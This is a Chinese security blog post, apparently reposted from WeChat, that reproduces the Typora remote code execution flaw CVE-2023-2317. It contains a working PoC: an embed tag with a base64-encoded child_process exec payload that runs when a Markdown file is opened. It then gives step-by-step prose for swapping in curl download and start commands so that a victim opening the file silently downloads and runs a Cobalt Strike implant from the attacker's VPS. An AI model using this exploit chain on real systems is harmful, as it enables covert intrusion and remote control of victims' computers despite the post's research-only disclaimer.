“ 人性的背后是白云苍狗,愿你我都是生活的高手。”

声明：文章中涉及的所有内容，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任！如有侵权烦请告知，我们会立即删除整改并向您致以歉意。谢谢！

0x01.正文介绍

Typora 1.6.7之前版本存在安全漏洞，该漏洞源于通过在标签中加载 typora://app/typemark/updater/update.html ，可以在Typora主窗口中加载JavaScript代码。

0x02.影响版本

Typora < 1.6.7

0x03.漏洞复现

当前版本为1.5.8

poc如下

<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">

新建一个md文件并打开，将poc复制进去并保存，Typora会将写入的内容默认识别为html

保存后重新打开，如果打开后如下不是一个空白页面则点击下面任意空白的地方，成功弹出计算器

上面的poc其中这一串base64为我们执行的系统命令

base64解密后可看到具体内容，此处calc为执行的命令

用vps开一个web服务，把cs的马放上去

将命令替换，使用curl去下载咱们vps的马到本地目录

重新将此内容进行base64编码

编码后替换之前Typora中base64的内容，此时如果受害者打开此md文件并点击，就会把马下载到他本地但是此时并未执行，所以我们需要继续添加内容，让他运行木马

通过start执行对应目录下的木马文件

后续和上面一样，将base64后的内容进行替换，复制到md文件中

一共两段，第一段是下载马，第二段执行如下

当受害者打开这个md文件后显示什么都没有，此时后台会执行系统命令先会对我们的vps请求下载cs的马

下载到本地后自动执行马，成功上线cs

遵守网络安全法，请勿用于非法入侵，仅供学习

原文始发于微信公众号（深白网安）：Typora 远程代码执行漏洞复现(CVE-2023-2317)上线Cobalt Strike